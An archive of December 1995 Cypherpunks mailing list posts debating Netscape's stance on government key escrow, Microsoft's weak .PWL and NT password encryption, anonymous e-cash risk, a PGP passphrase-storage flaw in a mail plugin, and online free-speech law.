>Jim Clark, top guy and owner of netscape, has issued a statement in
>support of government access to keys:
>
>
>    "To secure Net communications, the government
>      will need to have access to private data exchanges using
>      what is known as a key escrow security system
>     "
>
>and he has issued a statement that Jeff (a netscape employee) has very
>generously interpreted as anti GAK.  (Government access to keys)

You are quoting a reporter and attributing it to Jim Clark, do you
understand what is wrong with that?  You need to specify that this is
not his statement, but a report of the jist of his comments.

>The only clear and authoritative statement issued by Netscape on GAK
>is Jim Clark's speech in support of GAK. Everything else is a cloud of
>unintelligible fog, or was issued by people with no authority and
>given a minimum of publicity.

It has been reported by those that attended the Clipper II meeting on
Monday(?) that the Netscape representative read an official statement
very much in opposition to GAK.  As far as I know, Clark was not
speaking for Netscape when he was making the speach that you have
refered to.  Unless you believe that an employee of a company is
always speaking for the company when they speak in public or you have
some information I am unaware of, you are presuming that Clark's
opinions are thos of Netscape.

>Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
>Perhaps he needs a punchier ghostwriter:

Clark's statement was certainly something less than clearly in
oposition to GAK, but I think at worst he could be said to be resigned
to GAK, not a supporter of it.

>I offer my services free of charge.  :-)
>
>If Jim Clark wishes to persuade us that his heart is in the right
>place, he should put something like the following somewhere on the
>Netscape web pages:
>
>    "Our customers do not want government access to
>     their cryptographic keys.  Mandatory government
>     access to keys violates the rights of our
>     customers.  Therefore we will not foist
>     government access to keys on those customers
>     who have freedom to communicate securely.
>
>     We will only build government access to keys
>     into our products for those customers whose
>     governments force them to provide such access.
>    "
>
>If that really is Netscape's policy, then they should tell the world
>that that really is Netscape's policy, thus instantly relieving the
>fear, uncertainty, and doubt created by the unfortunate widespread
>misinterpretation of Jim Clark's original statements.

Jeff Weinstein has promised that when the representative from the
conference returns to Mountain View, they will publish his statement
on web.

>The only clear and authoritative statement issued by Netscape on GAK
>is Jim Clark's speech in support of GAK. Everything else is a cloud of
>unintelligible fog, or was issued by people with no authority and
>given a minimum of publicity.

Again, you seem fixated on making Clark's opinions equivelent to the
position of Netscape Communications Corp, this is not a reasonable
assumption.



Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 9 Dec 95 00:14:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker implemented as a Word Basic virus)
In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net>
Message-ID: <199512090815.DAA08976@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dan Bailey writes:
# No, but they're doing something that makes me very uncomfortable:  As
# I read this, they're hashing the password and some other user
# information using MD4 then doing some proprietary permutations on
# that.  Given their record with security, I'd rather they used straight
# MD4, rather than throwing in something that we can't analyze.

I don't quite agree with the last part. It might be educational to do a spot
of cryptanalysis in an attempt to determine the nature of the proprietary
algorithm used. It wouldn't be "cracking" the password protection, but I
think the general effort to "out" proprietary crypto algorithms is productive,
particularly in the case of major software packages.

Microsoft Knowledge Base article Q102716 says:
> Storage of the Passwords in the SAM Database
[...]
> The second encryption is decryptable by anyone who has access to the 
> double-encrypted password, the user's RID, and the algorithm. The second 
> encryption is used for obfuscation purposes.

Anyone feel like putting together some sample plaintext/ciphertext pairs ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 9 Dec 95 03:06:12 PST
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
Message-ID: <aceeac88170210047c8a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Credit where credit is due.

I for one am satisfied--and even pleased--with the Netscape position on GAK.

It remains to be seen how steadfast Netscape, as the major player in the
Web browser business, remains in the face of (likely) pressure from the
government.

It seems to me that we have have been quick to criticize Netscape--which is
good, the quickness part--and thus we should be equally quick to praise
them. To be sure, various of us might've written the Netscape position
statement slightly differently, but this does not change the basic point:
that Netscape has come out against the Administration's position on GAK.

For this they deserve our praise.

--Tim May (slightly drunk at 3 a.m. PST after a Robben Ford concert: highly
recommended if you like the blues)


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 9 Dec 95 01:59:39 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Netscape announces position against GAK
In-Reply-To: <30C953EC.28BA@netscape.com>
Message-ID: <199512091001.FAA09614@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


(Thanks, Jeff)

http://home.netscape.com/newsref/ref/encryption_export.html says (via JW):
> This week Netscape representatives attending a government presentation
> of the administration's proposed Key Escrow Policy for Export detailed
> the company's firm opposition to the proposed policy. Netscape is
> opposed to this type of proposal for a number of reasons including
[...]
> significant personal privacy concerns, 
[...]
> 	consumers inside the United States would be forced to use a 
>	government-approved key-escrow product if they value the ability to
>	communicate with others outside the United States.
[...]
>	3. Corporate and individual rights to privacy are placed in question
>	by the current U.S. Government escrow proposal and process. This
>	is so because of the mandatory nature of the proposal resulting
>	from the key escrow requirement itself
[...]

This is pretty weak w.r.t. GAK ("rights to privacy are placed in question by
the current [...] proposal"). Most of the position statement really 
addresses the key length limit. But as far as I'm concerned, it falls clearly
on the anti-GAK side of the line. 

(The phrasing "the mandatory nature of the proposal resulting from the
key escrow requirement itself" is a bit ambiguous. I'm taking it to refer to
the mandatory nature of Clipper etc.)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 8 Dec 95 23:42:00 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
Message-ID: <Pine.BSD.3.91.951209065559.7656A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   set up and run 'procmail'  --you can create folders for each list, or 
you can relegate whatever else with great flexibility to /dev/null/. 
additionally, procmail allows piped commands through external processes.

   there is absolutely no need to add CP to "Subject:"

	<attila>


On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?
> 
> Also, about Microsoft's .PWL file format. Will they be releasing the 
> new encryption method? Or are we not supposed to feel safe that our 
> passwords are protected in Windows95.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Fri, 8 Dec 95 23:41:26 PST
To: twcook@cts.com
Subject: Re: Netscape speaks with a forked tongue:
In-Reply-To: <m0tOJNm-000V7OC@mailhub.cts.com>
Message-ID: <30c93ded.17679242@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995 23:03:48 +0000, twcook@cts.com wrote:

>> 
>> Again, you seem fixated on making Clark's opinions equivelent to the
>> position of Netscape Communications Corp, this is not a reasonable
>> assumption.
>
>  Given Clark's position, I believe it is a reasonable assumption.  
>Unless of course you hold that the Corp. as a legal entity could have 
>a seperate position. In that case then WHO speaks for the 
>corporation?  Some lower level PR person?  I don't think so...<s>. 

My point is that anyone at any level can make two different types of
statements, those for themselves and those for the company.  If Jim
Clark makes a statement as the President of Netscape, then he is
speaking for Netscape.  If he makes a statement as Jim Clark, then he
is speaking for Jim Clark.  It is possible to not believe in something
ethically, yet see a financial advantage in supporting it.  Their is a
distinction that must be made, though admitedly the line does become
fuzzy when a senior person makes a statement, this is because he is
often the one driving the policy.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: oracle1@shell02.ozemail.com.au (Craig Massey)
Date: Fri, 8 Dec 95 16:53:54 PST
Subject: Oracle of Man
Message-ID: <4aaa5a$8mi@shell02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Whatever your Newsgroup interest may be,

The fact that you are using the Internet, means that you are part of the
greatest explosion of information technology (IT) in the history of mankind.
Computer developments are well documented but the future of artificial 
intelligence is limited only by our imagination.

Paul Phillips, owner of one of the largest IT companies in Australia,
has written a compelling book which is raising controversy and arguments
throughout the world. His disturbing and unnerving prediction is that we
are now close to a breakthrough in the race to give computers a conscious
intelligence. This will give them the ability to interface with human beings.
This giant leap forward brings the incredible possibility of being able to
"download" our whole psyche. This will include our personality, intelligence 
and knowledge transfering into Technological Life Forms" or "TLF's", to give
ourselves eternal life.

For further information, please visit our Web page on

http://www.oracle_of_man.aust.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 9 Dec 95 09:14:06 PST
To: cypherpunks@toad.com
Subject: .PWL spin
Message-ID: <199512091715.JAA29227@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The Seattle Times has a rather large article this morning (12/9/95) about
Microsoft's .PWL encryption weakness.  Selected quotes are provided for your
entertainment and enlightenment (give yourself one point for each piece of
inaccurate/incomplete  information or spin you can find).

Security flaw in Windows 95 to be fixed

Microsoft got word of the flaw from an Internet e-mail exchange last week
that included a short computer program for "hacking," or decrypting,
passwords contained in .pwl (password list) files.  The company immediately
began working on a fix.

"We wanted to be proactive on this before it became a problem," said Rob
Bennett, Windows 95 product manager.  The company has received no customer
complaints related to the issue and knows of no security breaches, Bennett said.

"There are people out there who will stay up all night cranking out code to
break any encryption," Bennett said.

(This was followed by some good quotes from Frank Stevenson, who wrote the
cracking code, on the seriousness of the weakness.  I was a little surprised
to see the reporter listed Frank's e-mail address in the article.  Frank, if
you're reading this, did you give Paul Andrews permission?  To me, this
seems like listing someone's telephone number and address in the body of an
article.)

Microsoft said it plans to strengthen the encryption, Bennett said.
Password data will be stored randomly, making it harder to find on the
computer, he added.

Microsoft recommends that information-systems directors disable password
storage until the fix is released.

One system administrator said the problem would have a greater effect on
less-secure environments, such as universities and other institutions, than
on corporations.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 9 Dec 95 06:26:10 PST
To: cman@communities.com (Douglas Barnes)
Subject: Re: NSA flying disk follow-up [Extremely Frivolous]
In-Reply-To: <v02120d07acee50acb4f2@[199.2.22.120]>
Message-ID: <199512091424.JAA05252@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I spoke with Dennis Cisco at the NSA today, and he is
> unwilling to sell or otherwise distribute the NSA flying
> disk promotional items "except at trade shows where we
> are promoting our technology transfer program." Since they
> are not planning on attending any such conferences in my
> area in the near future, it is unlikely I'll be able to help
> any of the (numerous) people who expressed an interest in
> obtaining one of these fine flying disks.
> (http://www.communities.com/foo/NSAfris.gif)

Hmmmm.
Gov't doc's can't be copyrighted; and if they're givng it out -- it
ain't Sekret. How about a new version with perl bar code ;-?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sat, 9 Dec 95 06:32:34 PST
To: futplex@pseudonym.com
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PW
Message-ID: <199512091433.OAA27353@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 03:15:51 -0500 (EST) you wrote:

>I don't quite agree with the last part. It might be educational to do a spot
>of cryptanalysis in an attempt to determine the nature of the proprietary
>algorithm used. It wouldn't be "cracking" the password protection, but I
>think the general effort to "out" proprietary crypto algorithms is productive,
>particularly in the case of major software packages.
>
>
>Anyone feel like putting together some sample plaintext/ciphertext pairs ?
>

Well, the problem with coming up with plaintext/ciphertext is that
I've never been able to find out exactly where the the SAM database is
physically stored.  Using Registry Editor, it's visible but not
accessible as part of the Registry.  Microsoft's APIs won't give you
access to the stored ciphertext, so some serious hacking is required
here, I'm just not sure where to begin.  I think a hacked version of
the Registry APIs that allow you to read the ciphertext would be a
good place to start, but again, I'm not sure where to begin writing
such a thing.
	The second problem is that we're not sure exactly what gets hashed
and in what order.  Is it username0x00password0x00domainname0x00SID or
something similar?  Tough to tell and MSoft wants to rely on the
"tamper-proofness" of NT rather than on algorithmic security.  If
anyone has more information on these issues, I'd love to know what's
really going on there.
						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 9 Dec 95 06:40:42 PST
To: frissell@panix.com>
Subject: Re: Geodesic Payment Systems?
In-Reply-To: <2.2b8.32.19951208104734.00878b10@panix.com>
Message-ID: <ckmNxkOMc50eE2iud2@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 8-Dec-95 Re: Geodesic Payment Systems?
Duncan Frissell@panix.co (912*)

> I seem to remember from my favorite Law School class -- Commercial Paper --
> that banks weren't liable if they paid out an account from cleared funds
> under the terms of the account.  A bank is responsible for payments made on
> a forged drawer's signature and anyone who accepts an instrument from a
> forged endorser eats the loss.  But online clearing with digital signatures
> makes it hard to forge the drawer's signature and digital cash doesn't have
> the sort of endorsement system used on paper checks.  

I think you're drawing a misleading analogy.  When I present e-cash to
the institution the underwrites the conversion from e-cash to "real
money", they have to decide if it's real or not.  If the e-cash is
anonymous, they are the *only* people on the line -- anonymous e-cash
doesn't carry history or say "this money is coming out of so-and-so's
account".  It is anonymous e-cash being converted to real money, and the
converting bank carries essentially all of the risk.

As far as the guarantees offered by digital signatures are concerned,
the whole point of my comments was to analyze the risks involved when
secret keys are compromised.  In this case, by definition, the digital
signatures are not very useful any more.
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 9 Dec 95 06:59:42 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tO6o4-00091AC@pacifier.com>
Message-ID: <ckmOE4WMc50eE2iw1m@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 8-Dec-95 Re: More FUD from First Vir..
jim bell@pacifier.com (1033*)

> What can stop it?  What should stop it?

Jon's right in identifying government as an entity that might try to
stop it, and might succeed to a frightening extent.  But they're not the
only ones.  Plenty of financial industry people and corporations have
similar motivations.  However, the real problem, I believe, is involved
in the technology of deploying and operating anonymous e-cash.

From a deployment standpoint, e-cash will be crippled if there are even
a few highly visible incidents in which the security of the system is
compromised, because it will scare the dickens out of whoever's doing
the conversion to real money (not to mention the users!).  Given that
the system is being built and administered by human beings, such
incidents are almost inevitable.  To put it simply:  anonymous e-cash is
a technological artifact that is designed in such a way as to create a
catastrophic failure scenario.  However low-probability such a scenario
is, I am a firm believer in Murphy's law:  what can go wrong will go
wrong.  The history of technology is overflowing with examples that
underscore this fact.

Now, people do effectively use technologies with low-probability
catastrophic risks, but they generally do so because of a compelling
motivation.  People strap themselves into the space shuttle because, in
exchage for the risk, they get to go into orbit, a pretty unusual
opportunity.  Many medical procedures bear catastrophic risks which
people endure in the hope of relief from pain or other ailments.  

For a real-world example, I have an inner ear disorder that makes me
frequently dizzy.  There's an operation that would have about a 95%
chance of curing me, and a 5% chance of making me deaf.  As a musician,
I have no motivation to take this gamble.  Alan Shepherd had the same
inner ear disorder, but he wasn't a musician, and he needed to be cured
of the dizziness in order to fly an Apollo rocket to the moon.  He had
the surgery and flew to the moon.  If I had a chance to fly to the moon,
I might risk my hearing too, but absent that possibility I prefer the
dizziness.  The big question is what motivates people to accept risks.

The real open question about anonymous digital cash is whether people
will want it badly enough to bear that kind of risk.  My guess is that a
few people will, and that a few (even fewer) small banks will accept the
risk, so there will indeed be a niche in anonymous cash.  But I think
that for better or worse, most people and banks won't value anonymity so
highly as to incur a low-probability catastrophic risk, which I think is
inherent in anonymous cash.

> Well, maybe I haven't been following those reasons, but I see little or no
> reason privacy should "inevitably carry a high surcharge."  If the relevant
> encryptions had to be carried out with a pencil and a piece of paper, that
> claim would make sense, but remember, we've got MICROPROCESSORS on our side!

The cost isn't the computation.  The cost comes primarily from the
efforts (both practical and actuarial) that will be made by the
underwriters to minimize and amortize their risk.  As Lloyds of London
has demonstrated, almost any risk can be undertaken at a high enough
premium....
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 9 Dec 95 07:14:09 PST
To: cypherpunks@toad.com
Subject: MAG_got
Message-ID: <199512091515.KAA13918@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The NYPaper Sunday Mag 12-10-95 has a longish soft-hitter
   by Tim Weiner about the CIA's never-say-die Deutch-uncle's
   CPR-wheezing the wormy carcass.


   MAG_got












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 9 Dec 95 12:07:32 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: More FUD from First Virtual
Message-ID: <m0tOVMF-000927C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 AM 12/9/95 -0500, you wrote:

>
>The real open question about anonymous digital cash is whether people
>will want it badly enough to bear that kind of risk.  My guess is that a
>few people will, and that a few (even fewer) small banks will accept the
>risk, so there will indeed be a niche in anonymous cash.  But I think
>that for better or worse, most people and banks won't value anonymity so
>highly as to incur a low-probability catastrophic risk, which I think is
>inherent in anonymous cash.

I find this hard (read: "impossible") to believe.  The significance of the
risk is, essentially, its magnitude multiplied by its probability.  Assuming
that its probability is reduced to an arbitrarily low value, SOMEBODY will
be willing to accept the risk in exchange for a return.  By way of
comparison, most credit card companies charge 2-3% of the value of a
transaction, which apparently the market has decided is a "reasonable" cost.
The question is, why wouldn't it be possible to raise the reliability of the
whole digital cash system simply to the point where somebody is willing to
accept the risk for, say, 0.5% of the value of each transaction, which would
be a good improvement over credit cards?

The answer, I think, it that there would be no problem finding people to
take that risk in exchange for the return, ESPECIALLY if they have some
input into the design (level of security) of the system.  They might insist
on 2048-bit RSA keys, instead of 1024-bit, for example.


>> Well, maybe I haven't been following those reasons, but I see little or no
>> reason privacy should "inevitably carry a high surcharge."  If the relevant
>> encryptions had to be carried out with a pencil and a piece of paper, that
>> claim would make sense, but remember, we've got MICROPROCESSORS on our side!
>
>The cost isn't the computation.  The cost comes primarily from the
>efforts (both practical and actuarial) that will be made by the
>underwriters to minimize and amortize their risk.  As Lloyds of London
>has demonstrated, almost any risk can be undertaken at a high enough
>premium....

However, the premium only needs to be high enough to cover the actual risk,
plus perhaps a little profit on the deal. (Even if the premium was 10x the
actual risk, or even 100x, I think it would end up costing well under 1% of
each transaction.)  

Your arguments seem to only be qualitative, not quantitative.  Maybe that's
why the other guy calls them "FUD."  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 9 Dec 95 10:06:41 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Escrow expectations
In-Reply-To: <Pine.SUN.3.91.951209011540.26292A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951209130747.5706H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995, Black Unicorn wrote:

> On Fri, 8 Dec 1995, Adam Shostack wrote:
> 
> > 	If there is no expectation of privacy when a key is escrowed
> > with Bob, or my companies attorneys, then would there be any
> > expectation of privacy under Clipper?  Perhaps this is a powerful
> > argument we should expect to have used against us...
> > 
> > 	"Your honor, we argue that in escrowing his keys with the US
> > government, the defendant should have known his communications could
> > be listened to, and thus has no expectation of privacy."
> 
> Uh, this was the entire point of that thread "is a lawyer in the house" yes.
> 
I argue in my Clipper article that while the government might make that 
argument, it would be unconscionable for the court to accept it.  I think 
there is a reasonable chance that the court would not.  But no certainty.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 9 Dec 95 13:08:42 PST
To: cypherpunks@toad.com
Subject: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512092108.NAA11006@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message.

From: investor@flood.xnet.com (Investortools)
Newsgroups: alt.security.pgp
Subject: warning about PMail-PGP
Date: 9 Dec 1995 00:47:46 GMT
Organization: XNet - A Full Service Internet Provider - (708) 983-6064
Lines: 5
Message-ID: <4aambi$e33@flood.xnet.com>
NNTP-Posting-Host: cyclone.xnet.com
X-Newsreader: TIN [version 1.2 PL2]

I just installed the "Open Encryptor" PGP interface for Pegasus  Mail.  I found that when you sign a message and queue it, it stores your password in the clear on the hard drive. Apparently
it doesn't sign or encrypt the message until just before
transmitting it.  So it stores your PGP private key password
with the message until it sends it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Dec 95 05:33:56 PST
To: cypherpunks@toad.com
Subject: E-Mail Privacy (CP boo)
Message-ID: <199512091335.OAA26498@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Forwarding Cyberia-L mail by: hayam@actcom.co.il (Avraham 
Hayam) on Sat, 9 Dec  6:16 AM
-------------------

Greetings,
 

The only way for E-Mail Privacy on the internet is - 
ENCRYPTION.  You don"t have to be an Internet Expert to 
understand that data which is not encrypted is open for every 
one.
 

On Oct. 20 1995 Andy Jonson-Laird <andy@jli.com> sent a most 
interesting data to the list concerning that the user has 
absulutly no control ever how the data is routed. A Mail that 
he sent to an address which is at the distance of 11 miles 
actualy did 1200 miles.
 

It may be  " The end of days vision" that privacy will be 
maintained without encryption. With the ongoing danger from the 
Cypherpunks, we must use very strong Algorithms. A French 
"algorithms cracker" recommended not long ago that the 
commercial sector have to use not less than 128 bytes based 
algorithms.
 

I will appreciate to receive list members opinion.


Avraham Hayam
IT Systems Security Consultants - ITSSC  
P.O.Box 11233 Jerusalem, 91112 ISRAEL
Tel: + 972 - 2 - 761 803; Fax: + 972 - 2 - 769 263
E-Mail: hayam@actcom.co.il   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Dec 95 06:03:56 PST
To: cypherpunks@toad.com
Subject: Congress vs. the Internet
Message-ID: <199512091405.PAA27249@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, 9 Dec 1995, Op-Ed.

Congress vs. the Internet

   The courts have upheld free speech. Why won't
   legislators?

By Shari Steele (EFF staff counsel)

San Francisco. While the courts continue to uphold the
freedom of speech on the Internet, the First Amendment is
under attack on Capitol Hill. On Wednesday, House members
of a House-Senate conference committee said they would
support a stringent new measure that would not only bar
words and ideas on the worldwide computer network that
one might hear on TV or read in this newspaper, but would
make criminals out of anyone transmitting these materials
electronically, including on-line servces.

This measure goes against the spirit of three sensible
court decisions on copyright law handed down in recent
weeks, all involving the Church of Scientology.

The first decision, issued by a Federal judge in
California last month, held that Internet service
providers, the gatekeepers to the information highway,
cannot be held liable for copyright infringement when
they have no knowledge of the content of their users'
messages.

This decision is important, because, like the telephone
company, the system's providers merely offer a conduit
for communications. If they can be held liable for the
content of messages, they are more likely to monitor
those messages and censor any that include language that
might get them in trouble.

Just as we don't want the phone company censoring our
telephone calls, we should be very troubled by any
copyright law interpretation that would assign liability
to those who provide Internet service.

The second and third decisions were issued last week by
a Federal judge in northern Virginia. In those cases, the
judge, Leonie M. Brinkema, admonished the Church of
Scientology for using lawsuits to silence its on-line
critics. After two of its former members posted
electronic criticism of Church of Scientology writings,
the church brought charges against them, their Internet
service providers and The Washington Post for including
two sentences from church documents in an article on the
case.

Judge Brinkema dismissed The Washington Post and two of
its reporters from the suit and held the Church of
Scientology and its affiliate responsible for the
newspaper's legal fees. "Although the Religious
Technology Center brought the complaint under traditional
secular concepts of copyright and trade secret law, it
has become clear that a much broader motivation prevailed
-- the stifling of criticism and dissent of the religious
practices of Scientology and the destruction of its
opponents," the judge wrote. The judge called this
motivation "reprehensible."

While the results of these preliminary decisions are
encouraging, they provide little solace to the larger
threat of on-line censorship.

Court decisions in the copyright realm, as these are, do
not address the damage Congress is doing to the First
Amendment h the name of protecting children from
obscenity, which remains ill-defind.

These early court victories are important, and the
on-line world breathed a collective sigh of relief over
the wise judgments.

But not all battles can be won in court. If Congress
presses forward with its attempt to criminalize
constitutionally protected speech, I fear that the First
Amendment will be left behind as more and more of what we
say is in the form of on-line communications.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 9 Dec 95 14:31:53 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.SUN.3.91.951208225309.7396J-100000@unix5.netaxs.com>
Message-ID: <199512092233.PAA01871@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I use mh and slocal and .maildevilry-- er.. 
I mean .maildelivery.  It seems to have a much less steep
learning curve than procmail does, and it does everything
that I need it to do.


Bryce

signature follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMMoOi/WZSllhfG25AQFa+QP9EQ/C7H2dgucNLXJ0PlyxNnNXudy3L0Xi
4kyCBO6htaHDSVzTOXnGVM9ppsEAHL09YdzOfJqktWOG7kt4GxM/c01r50lteKGb
KmDukT72udDztll9FhlQ8PTMlyv6qDjYID03wkgtymVH3CAyO3bDRaEHQDHEQCyj
ayhCjOVa21I=
=iD9R
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 9 Dec 95 12:43:37 PST
To: pfarrell@netcom.com
Subject: DC Cypherpunks Meeting, Dec 16. 3:00 PM
Message-ID: <56678.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a quick note: the next DC Cypherpunks meeting will be
December 16, starting at 3:00 PM, location: Digex Headquarters,
Greenbelt MD. See my dccp page for detail, instructions, etc.
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

Agenda:
1) Discussion of NIST Dec 5 GAK meeting
2) The web of trust is dead, lets invent another
3) ... suggestions welcome


Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 9 Dec 95 16:25:55 PST
To: raph@kiwi.cs.berkeley.edu
Subject: ideath remailer temporarily down
Message-ID: <199512092345.AA05521@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


The remailer located at remailer@ideath.goldenbear.com is currently 
unavailable because the local freenet (which handles DNS and MX service
for goldenbear.com) is making some configuration changes. Apologies for
not warning anyone, but I didn't get a warning either. 

Incoming mail for goldenbear.com should be spooling on sender's machines;
I haven't received any since late Thursday (12/7) evening. I don't know
when they'll get this fixed but I'm kinda pissed off about it and am 
exploring alternatives. Doh.

I'm reachable as gbroiles@darkwing.uoregon.edu as well.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMofY33YhjZY3fMNAQG7rwP/cLSbiqtDCm1frYSOqxTIitTaP/36v/7g
W+azO+zC1+k6ozWaGwcCqtgwi2Kmbv/XtCnDbzzQdSI6k0rJFwhbw5rDkxQ4W5sQ
9PNHO9UC1F7JyAEs7kTiZSxZpkqRdzx98P06wRfy4Hwkzy7OuoYm2jHYNlHDojcv
